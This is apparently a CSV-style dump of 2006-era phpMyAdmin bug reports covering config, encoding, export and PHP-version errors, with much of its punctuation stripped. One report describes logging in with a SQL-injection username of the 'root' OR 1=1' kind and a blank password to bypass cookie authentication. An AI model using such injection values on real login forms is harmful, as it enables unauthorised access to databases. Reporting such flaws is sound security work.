I just spent 2 hours trying to get a new install of phpMyAdmin working on a server which hasn t previously used it.
Eventually I realized it wasn t even reading the config.inc.php file.
I tested this by adding the line die test ); at the top of the config.inc.php file.
Sure enough, it continued on with the same can not connect to mysql socket error.
I downloaded 2.7.0pl2, and copied the config.inc.php file over and sure enough it die )d. When I removed the die ) line everything worked right away.
I m sorry I can not get into the guts of the code to figure out where it includes the config file and why it s not happening.
But I think this points to a serious issues with 2.8.0.3.
Original URL https sourceforge.net p phpmyadmin bugs 2114 https sourceforge.net p phpmyadmin bugs 2114 Original author dasil003 Found in version 2.8.0.3","bug"
"24444","8479","Click on Left Frame opens new window Mac Safari).
I have just updated from version 2.6.4 to 2.8.0.3 and I have found that when I click on one of my files on the left frame, or on the browse button that I am getting a new window instead of having it open in the Main part of the current window.
OS Mac OSX.4.6 Browser Safari v2.0.3) Have just tried it on Firefox, and it works as it should, so it looks like it might be a Safari problem.
Original URL https sourceforge.net p phpmyadmin bugs 2115 https sourceforge.net p phpmyadmin bugs 2115 Original author junkman nz Found in version 2.8.0 rc2","bug"
"24444","8480","InnoDB relation view messed up with MySQL 3.23.56. phpMyAdmin 2.8.0.3 MySQL client version 3.23.49 Used PHP extensions mysql MySQL 3.23.56 Max Protocol version 10 Server Localhost via UNIX socket Given InnoDB table order picture with referential constraints order) REFER foobar orders id); picture) REFER foobar picture id) as reported in structure view .
In relation view , both referenced columns show up as picture gt;id .
This is wrong.
Furthermore, it is impossible to update the relations with this view otherwise constraints are duplicated).
This problem also impacts data insertion and update.
This problem does not prevent referential constraints from working if they are managed through direct SQL.
But it prevents PMA from managing referencing tables.
This problem also occurs with all other databases and tables on the same database server.
It does not occur on MySQL 4.x.
However MySQL 3.23.56 is a legacy production server that cannot be replaced at this time.
Original URL https sourceforge.net p phpmyadmin bugs 2116 https sourceforge.net p phpmyadmin bugs 2116 Original author fpallini Found in version 2.8.0.3","bug"
"24444","8481","LoginCookieValidity missing in docs.
I just noticed that the option cfg[ LoginCookieValidity ] is not mentioned in the documentation.
Original URL https sourceforge.net p phpmyadmin bugs 2117 https sourceforge.net p phpmyadmin bugs 2117 Original author ci dev Found in version Latest Git","bug"
"24444","8482","Failure on with SQL query on server.
On server page select SQL and enter someting simple like SELECT 1.
You will get following error Fatal error Using this when not in object context in phpMyAdmin libraries Table.class.php on line 139 Original URL https sourceforge.net p phpmyadmin bugs 2118 https sourceforge.net p phpmyadmin bugs 2118 Original author nijel Found in version Latest Git","bug"
"24444","8483","Import impossible ver 2.8.0.3 OK in ver 2.6.4 pl4.
This bug may have something related to bug number 1468722 which I reported I created a csv file of a table with 1813 records using ver 2.8.0.3 no problem here).
When I try to import the data back to the table WICH BY THE WAY IS EMPTY) I get the following message back Error Invalid field count in CSV input on line 174.
If you run the very same query in version 2.6.4 pl4 it works perfectly except for a small bug WHICH I REPORTED BEFORE AND WAS CLOSED AND SUPPOSEDLY CORRECTED) which does not influence the result of the import.
I m using Windows XP, Apache 2.0.54 Win32, Php 4.3.11, and Mysql 4.1.13a nt.
I m a Spanish speaking person so I m using accented characters and use collation latin1 spanish ci when doing the IMPORT and windows 1252 as characters set for the file when doing the EXPORT.
I m uploading two files whith the following data The Table definition Elementos.sql The Table data Elementos.csv only the firs 180 records, enough to duplicate the error I TESTED IT MANY TIMES).
Original URL https sourceforge.net p phpmyadmin bugs 2119 https sourceforge.net p phpmyadmin bugs 2119 Original author yacar suscri Found in version 2.8.0.3","bug"
"24444","8484","Wrong logout link for advanced authentication.
In 2.8.0.3 the logout link on the main page is phpMyAdmin 2.8.0.3 user password.php?
old usr=oldusrname Therefore the frameset will not be reloaded and the Change password page will be displayed instead after relogin.
In prior versions the correct logout link was like phpMyAdmin index.php?lang=de iso 8859 1 server=1 old usr=oldusrname index.php or user password.php in 2.8.0.3) are hard coded in main.php.
Original URL https sourceforge.net p phpmyadmin bugs 2120 https sourceforge.net p phpmyadmin bugs 2120 Original author docinger Found in version 2.8.0.3","bug"
"24444","8485","REPLACE reports double results affected.
When ever I issue a replace into... SQL query the results report twice as many rows as being affected than actually are.
For example if I issue a REPLACE that inserts 10 rows into a table 20 rows are reported as being inserted.
Original URL https sourceforge.net p phpmyadmin bugs 2121 https sourceforge.net p phpmyadmin bugs 2121 Original author msiekkinen Found in version 2.6.0 pl3","bug"
"24444","8486","Invalid default value.
Using PHP5 MySQL 5.0.20.
I ve noticed several times I ll be updating a field and it will give me an invalid default value error.
This seems easy to produce, and it seems to be a PMA bug.
To test Create any table.
Add a field of any type Specify null and Default Value NULL .
Save field.
Modify Field Change null to not null and delete the Default Value.
gt; Error occurs.
Not null w no default should be perfectly legal, so there s no reason for the error.
The problem seems to be PMA not correctly understanding the desire to remove the default value.
Original URL https sourceforge.net p phpmyadmin bugs 2122 https sourceforge.net p phpmyadmin bugs 2122 Original author cyberdog3k Found in version 2.8.0.2","bug"
"24444","8487","does not read .
config.inc.php.
BUG FIXED by user When you follow the installation instruction to copy over the .
libraries config.inc.php to the top dir and fill in the values, no matter how many items you change, you still get an error logging in to the database.
The reson is that the file syntax is broken, so values are not read in correctly.
But myphpadmin does not report a problem parsing the config file!
cfg[ Servers ][ i][ AllowDeny ][ order ] Host authentication order, leave blank to not use = ; cfg[ Servers ][ i][ AllowDeny ][ rules ] Host authentication rules, leave blank for defaults = array ); I wasted hours on this, and it s my first time using it!
Another bug the setup.php tool does not save the configuration.
It happily says it s saved the file, but doesn t, no matter what the permissions are.
Original URL https sourceforge.net p phpmyadmin bugs 2123 https sourceforge.net p phpmyadmin bugs 2123 Original author tompotts Found in version 2.8.0.2","bug"
"24444","8488","Cannot export compressed SQL.
I am using the following phpMyAdmin 2.8.0.3 Apache 2.0.40 PHP 4.2.2 MySQL 3.23.58 I cannot export any compressed SQL using SSL.
I m not sure if not using SSL will work, but I don t want to enter my password unsecured.
I ve tried exporting ZIP, GZ, and BZIP and none work.
All that is exported is a 192 byte compressed file zip, gz, bz) and when I try to open it in WinRAR it says c \dbname.sql.gz The archive is either in unknown format or damaged.
Exporting just a plain text .sql file works though.
I ve had this problem since version 2.7.x at least.
Original URL https sourceforge.net p phpmyadmin bugs 2124 https sourceforge.net p phpmyadmin bugs 2124 Original author d11 Found in version 2.8.0.3","bug"
"24444","8489","Table selection missing.
Looks like I forgot to reinclude this code.
Original URL https sourceforge.net p phpmyadmin bugs 2126 https sourceforge.net p phpmyadmin bugs 2126 Original author nijel Found in version Latest Git","bug"
"24444","8490","Color lost ; ).
During some last changes in HEAD, bottom row on form lost it s blue color and became grey as rest of form is.
I guess this was a mistake and not expected change.
Original URL https sourceforge.net p phpmyadmin bugs 2125 https sourceforge.net p phpmyadmin bugs 2125 Original author nijel Found in version Latest Git","bug"
"24444","8491","if default server fails you cannot switch.
if the default server fails no connect, or any other error) you cannot switch to any other server in config auth mode Original URL https sourceforge.net p phpmyadmin bugs 2127 https sourceforge.net p phpmyadmin bugs 2127 Original author cybot tm","bug"
"24444","8492","with rtl langs, navi links open in wrong frame.
with rtl language selected, links in the navi frame will open inside the navi frame Original URL https sourceforge.net p phpmyadmin bugs 2129 https sourceforge.net p phpmyadmin bugs 2129 Original author cybot tm Found in version 2.8.0.3","bug"
"24444","8493","Undefined offset on duplicate key.
While inserting row with duplicate key I got this notice Notice Undefined offset 1 in pma libraries common.lib.php on line 978 Original URL https sourceforge.net p phpmyadmin bugs 2128 https sourceforge.net p phpmyadmin bugs 2128 Original author nijel Found in version Latest Git","bug"
"24444","8494","select in stored procedure creates an error.
I have a simple stored procedure with a single select statement in it.
When called, phpmyadmin returns an error SQL query SELECT DATABASE ) AS db ; MySQL said 2013 Lost connection to MySQL server during query Here is the source for the stored procedure delimiter drop procedure if exists test select CREATE PROCEDURE test select sc char 4)) proc BEGIN BEGIN SELECT from service.ad mstr where site code like sc; END; END; DELIMITER ; I m using mysqli to access this database as setup in the configuration file.
Stored procedure returns results correctly using mysql command line client.
Original URL https sourceforge.net p phpmyadmin bugs 2130 https sourceforge.net p phpmyadmin bugs 2130 Original author tllong Found in version 2.8.0.3","bug"
"24444","8495","Howto to make string display correct in phpmyadmin?.
Hi, New versions of all, new glpi, new database.
php.ini, my.ini same as before.
Apache Web Server Version 2.0.55 PHP Script Language Version 5.1.2 MySQL Database Version 5.0.20a nt client MySQL 5.0.20a phpMyAdmin Database Manager Version 2.8.0.3 GLPI 0.65 First in GLPI application i type this text in a commen t field in the glpi contacts table.
The display is normal, backup and restore trough GLPI is ok. insertion depuis glpi xc3x82xc3xa2xc3x84xc3x8axc3xa9xc3x8bxc3xa8xc3xabxc3xaaxc3xaexc3xafxc3x96xc3x94xc3xb6xc3xb4xc3xb9xc3xbbxc3x9bxc3xa7xc3xbfxe2x82xacxc3xb1xc3x91 Then I go in phpmyadmin to see how it looks and test exportation.
It s not readable!
insertion depuis glpi xc3x83xe2x80x9axc3x83xc2xa2xc3x83xe2x80x9exc3x83xc5xa0xc3x83xc2xa9xc3x83xe2x80xb9xc3x83xc2xa8xc3x83xc2xabxc3x83xc2xaaxc3x83xc2xaexc3x83xc2xafxc3x83xc3xa2xc3x83xe2x80x9dxc3x83xc2xb6xc3x83xc2xb4xc3x83xc2xb9xc3x83xc2xbbxc3x83xe2x80xbaxc3x83xc2xa7xc3x83xc2xbfxc3xa2xe2x80x9axc2xacxc3x83xc2xb1xc3x83xc3xa2 So i tried to add the same string in the same field from phpmyadmin and got all text is part of it) insertion depuis glpi xc3x83xe2x80x9axc3x83xc2xa2xc3x83xe2x80x9exc3x83xc5xa0xc3x83xc2xa9xc3x83xe2x80xb9xc3x83xc2xa8xc3x83xc2xabxc3x83xc2xaaxc3x83xc2xaexc3x83xc2xafxc3x83xc3xa2xc3x83xe2x80x9dxc3x83xc2xb6xc3x83xc2xb4xc3x83xc2xb9xc3x83xc2xbbxc3x83xe2x80xbaxc3x83xc2xa7xc3x83xc2xbfxc3xa2xe2x80x9axc2xacxc3x83xc2xb1xc3x83xc3xa2 insertion depuis phpmyadmin xc3x82xc3xa2xc3x84xc3xa0xc3x8axc3xa9xc3x8bxc3xa8xc3xabxc3xaaxc3xaexc3xafxc3x96xc3x94xc3xb6xc3xb4xc3xb9xc3xbbxc3x9bxc3xa7xc3xbfxe2x82xacxc3xb1xc3x91 When I go back to GLPI surprise insertion depuis glpi xc3x82xc3xa2xc3x84xc3x8axc3xa9xc3x8bxc3xa8xc3xabxc3xaaxc3xaexc3xafxc3x96xc3x94xc3xb6xc3xb4xc3xb9xc3xbbxc3x9bxc3xa7xc3xbfxe2x82xacxc3xb1xc3x91 insertion depuis phpmyadmin xefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbdxefxbfxbd When i try to visualise with mysql command line i get | ID | name | phone | phone2 | fax | email | type | comments | deleted | notes | | 1 | TEST | | | | | 0 | insertion depuis glpi xe2x94x9cxc3xa2xc3x94xc3x87xc3x9cxe2x94x9cxc3xa2xe2x94xacxc3xb3xe2x94x9cxc3xa2xc3x94xc3x87xc3x97xe2x94x9cxc3xa2xe2x94xbcxc3xa1xe2x94x9cxc3xa2xe2x94xac xc2xaexe2x94x9cxc3xa2xc3x94xc3x87xe2x95xa3xe2x94x9cxc3xa2xe2x94xacxc2xbfxe2x94x9cxc3xa2xe2x94xacxc2xbdxe2x94x9cxc3xa2xe2x94xacxc2xacxe2x94x9cxc3xa2xc3xa2 xc2x94xc2xacxc2xabxe2x94x9cxc3xa2xe2x94xacxc2xbbxe2x94x9cxc3xa2xc3x94xc3x87xc3xb4xe2x94x9cxc3xa2xc3x94xc3x87xc3x98xe2x94x9cxc3xa2xe2x94xacxc3x82xe2x94x9cxc3x83 xc2xa2xe2x94xacxe2x94xa4xe2x94x9cxc3xa2xe2x94xacxe2x95xa3xe2x94x9cxc3xa2xe2x94xacxe2x95x97xe2x94x9cxc3xa2xc3x94xc3x87xe2x95x91xe2x94x9cxc3xa2xe2x94xacxc3x82 xc2xbaxe2x94x9cxc3xa2xe2x94xacxe2x94x90xe2x94x9cxc3xb3xc3x94xc3x87xc3x9cxe2x94xacxc2xbcxe2x94x9cxc3xa2xe2x94xacxe2x96x92xe2x94x9cxc3xa2xc3x94xc3x87xc3xbf insertion depuis phpmyadmin xe2x94x9cxc3xa9xe2x94x9cxc3xb3xe2x94x9cxc3xa4xe2x94x9cxc3xa1xe2x94x9cxc3xa8xe2x94x9cxc2xaexe2x94x9cxc3xafxe2x94x9cxc2xbfxe2x94x9cxc2xbdxe2x94x9cxc2xac xe2x94x9cxc2xabxe2x94x9cxc2xbbxe2x94x9cxc3xbbxe2x94x9cxc3xb6xe2x94x9cxc3x82xe2x94x9cxe2x94xa4xe2x94x9cxe2x95xa3xe2x94x9cxe2x95x97xe2x94x9cxc3xb8xc3xa2xc2x94 xc2x9cxc2xbaxe2x94x9cxe2x94x90xc3x94xc3xa9xc2xbcxe2x94x9cxe2x96x92xe2x94x9cxc3xa6 | N | | 1 row in set 0.00 sec) This let me think that mysql encode decode has to be setup somewhere.
My aim is to keep this chain Axc3xa0xc3xa2xc3xa4xc3xa9xc3xa8xc3xaaxc3xabxc3xaexc3xafxc3xb4xc3xb6xc3xbcxc3xbbxc3xb1 readable all the way from glpi to phpmyadmin and mysql.
Any suggestion?
Thanks by advance.
Gilles Original URL https sourceforge.net p phpmyadmin bugs 2131 https sourceforge.net p phpmyadmin bugs 2131 Original author brokengillou","bug"
"24444","8496","Add new user password backslash error.
Invalid SQL error is generated when attempting to create a new user when supplying a password ending with a backslash.
Although you can properly change your password to anything ending with a backslash.
Original URL https sourceforge.net p phpmyadmin bugs 2133 https sourceforge.net p phpmyadmin bugs 2133 Original author skinums Found in version 2.8.0.3","bug"
"24444","8497","user can browse all databases with only db .
Hi, When I set in config file cfg[ Servers ][ i][ only db ] = array db1 , db2 ); in left frame I can see only these databases it is ok).
But when I click on Databases link in right frame I can see and browse all databases, user currently logged in have access it is a bug I think) ) Versions PMA 2.8.0.3 MYSQL 5.0.19 PHP 5.1.2 Original URL https sourceforge.net p phpmyadmin bugs 2132 https sourceforge.net p phpmyadmin bugs 2132 Original author jacek kal Found in version 2.8.0.3","bug"
"24444","8498","problems with use of column priv.
I have a user with no privileges in tables lt;user gt; and lt;db gt;.
He has Column priv = Select in table lt;tables priv gt; on one table.
Additionaly he has Column priv = Select on different columns in table lt;columns priv gt;.
If this user is loged in PhpMyAdmin does not check these privileges.
So if I use the Button Browse I get an Error, because PhpMyAdmin trys to Send SELECT FROM lt;mytable gt;.
Under the Button Search all fields are listed and not only the fields with select privileges.
By the way I use English UTF 8 and I receive error messages in german and the german umlaut ist a wrong character ?).
The Browser Encoding is correct, utf 8.
Original URL https sourceforge.net p phpmyadmin bugs 2134 https sourceforge.net p phpmyadmin bugs 2134 Original author toza Found in version 2.2.6","bug"
"24444","8499","Array to string Conversion PHP 5.1.3).
Hi everybody, I ve tried PHP 5.1.3 with success, but an error occurred while using PMA 2.8.0.3 works fine with PHP 5.1.2).
Here s the error Array to string conversion in data www phpMyAdmin 2.8.0.3 libraries tbl replace fields.inc.php on line 130 And the error occurs when I click on the modify link in the Browse mode, then I change any value or not, and when I post the modifications using Execute I don t know the exact translations as mine is French) the error occurs.
Many other errors are visible then, but I think it s just the first one that implies the others.
To conclude, the SQL query is not executed, and I can see barely some keywords appearing as Array instead of CONVERT or so.
Do you need more details ?
Original URL https sourceforge.net p phpmyadmin bugs 2135 https sourceforge.net p phpmyadmin bugs 2135 Original author blade1o6 Found in version 2.8.0.3","bug"
"24444","8500","Changing language doesn t work.
When you desactivate the force default language cfg[ lang ] = ; ), the user can t changed the language interface anymore if it s already set inside a cookie.
In main.php, the select box send the new lang with POST method.
The PMA langCheck ) function is then call in libraries select lang.lib.php to set the language.
Since cfg[ lang ] is empty, it go to the second test.
The REQUEST array contains POST[] and COOKIE[] in that order I think.
GET also).
COOKIE[ lang ] variable contains old lang setting and overwrite new POST[ lang ] settings.
A way to correct this issue is to replace REQUEST by POST in this code check user requested language if !
empty REQUEST[ lang ])) \{ if PMA langSet REQUEST[ lang ])) \{ return true; \} else \{ GLOBALS[ lang failed request ] = REQUEST[ lang ]; \} \} Original URL https sourceforge.net p phpmyadmin bugs 2136 https sourceforge.net p phpmyadmin bugs 2136 Original author yanmorin Found in version Latest Git","bug"
"24444","8501","preg match problems.
Whenever I try to insert data into a table oder change data inside a table, I get this Warning preg match ) expects parameter 2 to be string, array given in usr share phpmyadmin tbl replace.php on line 163 Warning preg match ) expects parameter 2 to be string, array given in usr share phpmyadmin tbl replace.php on line 165 Warning Cannot modify header information headers already sent by output started at usr share phpmyadmin tbl replace.php 163) in usr share phpmyadmin libraries header http.inc.php on line 13 Warning Cannot modify header information headers already sent by output started at usr share phpmyadmin tbl replace.php 163) in usr share phpmyadmin libraries header http.inc.php on line 14 Warning Cannot modify header information headers already sent by output started at usr share phpmyadmin tbl replace.php 163) in usr share phpmyadmin libraries header http.inc.php on line 15 Warning Cannot modify header information headers already sent by output started at usr share phpmyadmin tbl replace.php 163) in usr share phpmyadmin libraries header http.inc.php on line 16 Warning Cannot modify header information headers already sent by output started at usr share phpmyadmin tbl replace.php 163) in usr share phpmyadmin libraries header http.inc.php on line 19 The generated SQL query example) UPDATE `Behoerden` SET `ID` = Array , `Bezeichnung` = Array Bezirksregierung Mxc3xbcnster ),`Testfrist` = Array WHERE `ID` =12 LIMIT 1 w00t?
Array?
Never.
Versions ii libapache2 mod 5.1.3 1.dotdeb ii php db 1.7.6 2 ii php http 1.3.6 2 ii php mail 1.1.6 2 ii php net smtp 1.2.6 2 ii php net socket 1.0.6 2 ii php pear 5.1.2 1 ii php xml parser 1.2.6 2 ii php5 5.1.3 1.dotdeb ii php5 cli 5.1.3 1.dotdeb ii php5 common 5.1.3 1.dotdeb ii php5 dev 5.1.3 1.dotdeb ii php5 gd 5.1.3 1.dotdeb ii php5 mcrypt 5.1.3 1.dotdeb ii php5 mysql 5.1.3 1.dotdeb ii phpmyadmin 2.8.0.3 1 Original URL https sourceforge.net p phpmyadmin bugs 2137 https sourceforge.net p phpmyadmin bugs 2137 Original author wtaler","bug"
"24444","8502","Running php 5.1.3 , getting several errors ..
When trying to update a INT type field , im getting the following errors .
Warning urldecode ) expects parameter 1 to be string, array given in var www vhcs2 gui tools pma pma tbl replace.php on line 181 Warning urldecode ) expects parameter 1 to be string, array given in var www vhcs2 gui tools pma pma tbl replace.php on line 181 Warning preg match ) expects parameter 2 to be string, array given in var www vhcs2 gui tools pma pma tbl replace.php on line 163 Warning preg match ) expects parameter 2 to be string, array given in var www vhcs2 gui tools pma pma tbl replace.php on line 165 Warning urldecode ) expects parameter 1 to be string, array given in var www vhcs2 gui tools pma pma tbl replace.php on line 181 Warning urldecode ) expects parameter 1 to be string, array given in var www vhcs2 gui tools pma pma tbl replace.php on line 181 Warning preg match ) expects parameter 2 to be string, array given in var www vhcs2 gui tools pma pma tbl replace.php on line 163 Warning preg match ) expects parameter 2 to be string, array given in var www vhcs2 gui tools pma pma tbl replace.php on line 165 Warning preg match ) expects parameter 2 to be string, array given in var www vhcs2 gui tools pma pma tbl replace.php on line 163 Warning preg match ) expects parameter 2 to be string, array given in var www vhcs2 gui tools pma pma tbl replace.php on line 165 Warning Cannot modify header information headers already sent by output started at var www vhcs2 gui tools pma pma tbl replace.php 181) in var www vhcs2 gui tools pma pma libraries ob.lib.php on line 61 Warning Cannot modify header information headers already sent by output started at var www vhcs2 gui tools pma pma tbl replace.php 181) in var www vhcs2 gui tools pma pma libraries header http.inc.php on line 13 Warning Cannot modify header information headers already sent by output started at var www vhcs2 gui tools pma pma tbl replace.php 181) in var www vhcs2 gui tools pma pma libraries header http.inc.php on line 14 Warning Cannot modify header information headers already sent by output started at var www vhcs2 gui tools pma pma tbl replace.php 181) in var www vhcs2 gui tools pma pma libraries header http.inc.php on line 15 Warning Cannot modify header information headers already sent by output started at var www vhcs2 gui tools pma pma tbl replace.php 181) in var www vhcs2 gui tools pma pma libraries header http.inc.php on line 16 Warning Cannot modify header information headers already sent by output started at var www vhcs2 gui tools pma pma tbl replace.php 181) in var www vhcs2 gui tools pma pma libraries header http.inc.php on line 19 Error SQL query Edit UPDATE `domain` SET `domain name` = xxxxxxxxxxxxxxx , `domain gid` = 2008 , `domain uid` = 2008 , `domain admin id` = Array Array ), `domain created id` = 2 , `domain created` = Array , `domain last modified` = 50 , `domain mailacc limit` = 1 , `domain ftpacc limit` = 1 , `domain traffic limit` = 20000 , `domain sqld limit` = 20 , `domain sqlu limit` = 20 , `domain status` = ok , `domain alias limit` = Array 19 ), `domain subd limit` = 1 , `domain ip id` = 9 , `domain disk limit` = Array 150 ), `domain disk usage` = 58048 , `domain php` = yes , `domain cgi` = Array WHERE `domain`.`domain id` =8 LIMIT 1 MySQL said Documentation 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near Array ), `domain created id` = 2 , `domain created` = Array , `domain last m at line 1 Original URL https sourceforge.net p phpmyadmin bugs 2138 https sourceforge.net p phpmyadmin bugs 2138 Original author kevin my","bug"
"24444","8503","Incorrect statement delimiter on EXPORT UPDATE.
When doing an EXPORT with the Export type set to UPDATE the UPDATE statements are separated with a comma instead of a semi colon.
On 2.6.0 rc3 the statements were correctly terminated with a semi colon Original URL https sourceforge.net p phpmyadmin bugs 2139 https sourceforge.net p phpmyadmin bugs 2139 Original author captainp Found in version 2.8.0.3","bug"
"24444","8504","Editing of rows is not possible => error with urldecode func.
After upgrading PHP 5.1.2 to 5.1.3, I found a bug in PHPMyAdmin latest version = gt; 2.8.0.3) which prohibited me to edit my records via the built in forms.
The following errors I got Warning urldecode ) expects parameter 1 to be string, array given in usr home veer public html pma tbl replace.php on line 181 Warning urldecode ) expects parameter 1 to be string, array given in usr home veer public html pma tbl replace.php on line 181 Warning preg match ) expects parameter 2 to be string, array given in usr home veer public html pma tbl replace.php on line 163 Warning preg match ) expects parameter 2 to be string, array given in usr home veer public html pma tbl replace.php on line 165 Warning Cannot modify header information headers already sent by output started at usr home veer public html pma tbl replace.php 181) in usr home veer public html pma libraries ob.lib.php on line 61 Warning Cannot modify header information headers already sent by output started at usr home veer public html pma tbl replace.php 181) in usr home veer public html pma libraries header http.inc.php on line 13 Warning Cannot modify header information headers already sent by output started at usr home veer public html pma tbl replace.php 181) in usr home veer public html pma libraries header http.inc.php on line 14 Warning Cannot modify header information headers already sent by output started at usr home veer public html pma tbl replace.php 181) in usr home veer public html pma libraries header http.inc.php on line 15 Warning Cannot modify header information headers already sent by output started at usr home veer public html pma tbl replace.php 181) in usr home veer public html pma libraries header http.inc.php on line 16 Warning Cannot modify header information headers already sent by output started at usr home veer public html pma tbl replace.php 181) in usr home veer public html pma libraries header http.inc.php on line 19 When I take a look at the query that was composed, it seems to be broken aswel UPDATE `aanmeldingen` SET `man` = Array , `vervoer` = , `amf ok` = 1 , `utr ok` = 1 , `emailadres` = Array , `opmerkingen` = Array Array ), `betaald` = y , `tijdstip` = NULL WHERE `id` =5 LIMIT 1 The first field man should contain a integer in this case 1), emailadres should contain an string the emailaddress), opmerkingen is supposed to be a textfield.
The other fields appear to be right.
I will take a look at the source code soon.
Original URL https sourceforge.net p phpmyadmin bugs 2140 https sourceforge.net p phpmyadmin bugs 2140 Original author veer0318 Found in version 2.8.0.3","bug"
"24444","8505","PRIMARY and INDEX keys should not both be set .. .
Hi, I have a table CREATE TABLE `ImportFiles` `filesize` int 11) NOT NULL, `date` datetime NOT NULL, `filename` varchar 255) NOT NULL, `imported` tinyint 4) NOT NULL, PRIMARY KEY `filename`,`filesize`,`date`), KEY `filename` `filename`,`imported`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; Now in phpMyAdmin it shows PRIMARY and INDEX keys should not both be set for column `filename` .
I think this is not logical because it s perfectly legal to have those 2 indexes because MySQL afaik) is not capable of using 2 indexes on the same table.
Greetings, Steven Original URL https sourceforge.net p phpmyadmin bugs 2141 https sourceforge.net p phpmyadmin bugs 2141 Original author g00fy Found in version 2.8.0.3","bug"
"24444","8506","Undefined offset 1 in common.lib.php.
Whenever I import a .sql file and it shows the SQL query result the .sql file with added comments like Affected rows 1 and such), I get the following above the SQL query table and below the navbar at the top Import has been successfully finished, 36 queries executed.
Notice Undefined offset 1 in x \apache\bin\phpmyadmin\libraries\common.lib.php on line 2086 Notice Undefined offset 1 in x \apache\bin\phpmyadmin\libraries\common.lib.php on line 2086 It does this with any .sql file that is short enough for the detailed table view.
I have not modified common.lib.php, and even tried replacing it with a copy directly from the .zip file.
It seems to insert the data just fine, though.
Attached is a copy of a phpinfo ) output.
Running MySQL server is version 5.0.21 community nt.
Original URL https sourceforge.net p phpmyadmin bugs 2142 https sourceforge.net p phpmyadmin bugs 2142 Original author bradgrafelman Found in version 2.8.0.3","bug"
"24444","8507","Bug with Search Database Fix provided).
When searching a database by clicking the search tab, phpMyAdmin will often return a browse button due to URL length limits) instead of a text link.
When a button is returned, depending on the PHP configuration, it may not work due to missing hidden form items.
The cause of this bug is due to the URL separator.
PMA generate common url ) may return a URL with variables separated by ; and not .
However PMA linkOrButton ) expects URL variables to be separated by only and does not check to see if it could be ; This means that it does not create the form entry correctly.
I ve tested this with 2.8.0.3, not had chance to test with the latest CVS, so my apologies if it has been fixed.
To fix on our installs I replaced the following in PMA linkOrButton ) query parts = explode , url parts[ query ]); With php arg separator input = ini get arg separator.input ); if strpos php arg separator input, ; ) !== false) \{ separator = ; ; \} elseif strlen php arg separator input) gt; 0) \{ separator = php arg separator input\{0\}; \} else \{ separator = ; \} query parts = explode separator, url parts[ query ]); Which is the separator code taken from PMA generate common url ) Thanks, Original URL https sourceforge.net p phpmyadmin bugs 2143 https sourceforge.net p phpmyadmin bugs 2143 Original author karl austin Found in version 2.8.0.3","bug"
"24444","8508","Possibility to access phpmyadmin without proper credentials.
When I logged on with the username [ root OR 1=1 ) ] and a blank password, I was able to gain access to phpmyadmin.
I got the same right s as phpmyadmin uses to check credentials.
Cookie authentication was enabled.
Original URL https sourceforge.net p phpmyadmin bugs 2144 https sourceforge.net p phpmyadmin bugs 2144 Original author brechtkets Found in version 2.8.0.3","bug"
"24444","8509","Underscore in only db name causes No databases .
I am trying to set up a configuration that allows access to only one database using the only db configuration.
This usually works without problems, unless the database name contains an character.
In this case, the left frame does not display the database tables.
This is probably related to the functionality that splits database names by underscores to group indent them in the database selection dropdown.
MARK Original URL https sourceforge.net p phpmyadmin bugs 2145 https sourceforge.net p phpmyadmin bugs 2145 Original author markarnold Found in version 2.8.0.4","bug"
"24444","8510","Minor error in setup.php on fail dir checks.
In scripts setup.php there is a small error in the fail dir check.
Upon first invocation the config dir might exist, but config.inc.php does not yet.
Therefor fail dir = fail dir || !is dir .
config ); is okay but fail dir = fail dir || !is writable .
config config.inc.php ); will fail.
Fix Place a file exists check for config.inc.php.
In case the files does not exist, check if the directory is writeable which will automatically create config.inc.php upon finishing any call to setup.php.
fail dir = fail dir || !is writable .
config ); Only if config.inc.php exists check if the file is actually writeable itself.
Original URL https sourceforge.net p phpmyadmin bugs 2146 https sourceforge.net p phpmyadmin bugs 2146 Original author neufeind Found in version 2.8.1 rc1","bug"
"24444","8511","setup.php does not work no action possible).
Clicking a button like Add to add a server does not work here.
That s because of security checks in libraries common.lib.php.
The code says allow list = array db , table , lang , server , convcharset , collation connection , target , Session ID phpMyAdmin , Cookie preferences pma lang , pma charset , pma collation connection , pma convcharset , Possible login form pma username , pma password , ); keys = array keys REQUEST); Remove any non allowed stuff from requests foreach keys as key) \{ if !in array key, allow list)) \{ unset REQUEST[ key]); unset GET[ key]); unset POST[ key]); unset GLOBALS[ key]); \} \} Here POST[ action ] is unset.
Was the REQUEST[ token ] added to work around this issue?
There is no token supplied when clicking the button and thereby sending the form in setup.php.
Original URL https sourceforge.net p phpmyadmin bugs 2147 https sourceforge.net p phpmyadmin bugs 2147 Original author neufeind Found in version 2.8.1 rc1","bug"
"24444","8512","Undefined variable.
var noDropDbMsg = lt;br gt; lt;b gt;Notice lt; b gt; Undefined index is superuser in lt;b gt; home mic private phpMyAdmin libraries header.inc.php lt; b gt; on line lt;b gt;69 lt; b gt; lt;br gt; Original URL https sourceforge.net p phpmyadmin bugs 2148 https sourceforge.net p phpmyadmin bugs 2148 Original author nijel Found in version Latest Git","bug"
"24444","8513","Lost connection to MySQL SELECT DISTINCT) mysqli.
Data Dump phpMyAdmin SQL Dump version 2.8.0.3 http www.phpmyadmin.net Host localhost Generation Time May 17, 2006 at 11 50 AM Server version 5.0.18 PHP Version 5.1.2 Database `test` Table structure for table `test` CREATE TABLE `test` `id` tinyint 3) unsigned NOT NULL auto increment, `test` varchar 50) NOT NULL, PRIMARY KEY `id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO INCREMENT=4 ; Dumping data for table `test` INSERT INTO `test` `id`, `test`) VALUES 1, Test ), 2, Foo ), 3, Bar ); After creating the table above, I try to run the following query from the SQL tab SELECT DISTINCT `test` FROM `test`; But I get the following error Error SQL query SELECT FOUND ROWS ) AS count; MySQL said 2013 Lost connection to MySQL server during query However, if I remove the semi colon at the end, I receive no error.
Strange?
PHP, MySQL and PMA versions in data dump.
Original URL https sourceforge.net p phpmyadmin bugs 2149 https sourceforge.net p phpmyadmin bugs 2149 Original author majiclab Found in version 2.8.1","bug"
"24444","8514","Bad Identification.
I just installed latest released version 2.8.1 dated 2006 5 20.
